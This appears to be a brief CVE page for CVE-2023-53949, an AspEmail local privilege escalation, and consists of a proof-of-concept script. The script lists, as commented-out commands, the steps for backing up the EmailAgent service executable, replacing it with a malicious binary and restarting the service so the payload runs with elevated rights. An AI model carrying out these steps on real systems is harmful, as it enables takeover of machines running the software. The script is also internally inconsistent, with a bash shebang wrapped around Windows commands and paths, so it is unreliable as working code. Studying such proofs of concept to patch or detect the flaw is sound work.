CVE-2023-53949 | AspEmail本地权限提升漏洞（高危）

#!/bin/bash # CVE-2023-53949 PoC - AspEmail Binary Permission Vulnerability # This PoC demonstrates the privilege escalation via binary replacement TARGET_DIR="C:\\Program Files\\AspEmail\\Bin" MALICIOUS_EXE="malicious.exe" BACKUP_EXE="EmailAgent.exe.bak" # Step 1: Check current permissions on BIN directory #icacls "$TARGET_DIR" # Step 2: Backup original executable #copy "$TARGET_DIR\\EmailAgent.exe" "$TARGET_DIR\\$BACKUP_EXE" # Step 3: Replace service executable with malicious payload #copy "$MALICIOUS_EXE" "$TARGET_DIR\\EmailAgent.exe" # Step 4: Restart the EmailAgent service to execute payload #net stop EmailAgent #net start EmailAgent echo "PoC for CVE-2023-53949" echo "Target: AspEmail 5.6.0.2 EmailAgent Service" echo "Attack: Binary replacement for privilege escalation"